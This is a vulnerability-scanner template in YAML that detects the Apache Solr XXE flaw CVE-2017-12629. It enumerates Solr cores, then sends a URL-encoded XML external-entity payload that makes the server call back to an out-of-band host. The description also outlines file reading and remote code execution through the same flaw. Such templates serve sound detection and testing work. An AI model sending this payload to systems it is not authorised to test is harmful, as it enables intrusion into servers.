45 lines
2.1 KiB
YAML
45 lines
2.1 KiB
YAML
id: CVE-2017-12629
|
|
|
|
info:
|
|
name: Apache Solr <= 7.1 - XML Entity Injection
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
|
|
reference:
|
|
- https://twitter.com/honoki/status/1298636315613974532
|
|
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
|
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2017-12629
|
|
cwe-id: CWE-611
|
|
tags: oast,xxe,vulhub,cve,cve2017,solr,apache
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /solr/admin/cores?wt=json HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
extractors:
|
|
- type: regex
|
|
internal: true
|
|
name: core
|
|
group: 1
|
|
regex:
|
|
- '"name"\:"(.*?)"'
|
|
|
|
# Enhanced by mp on 2022/04/26
|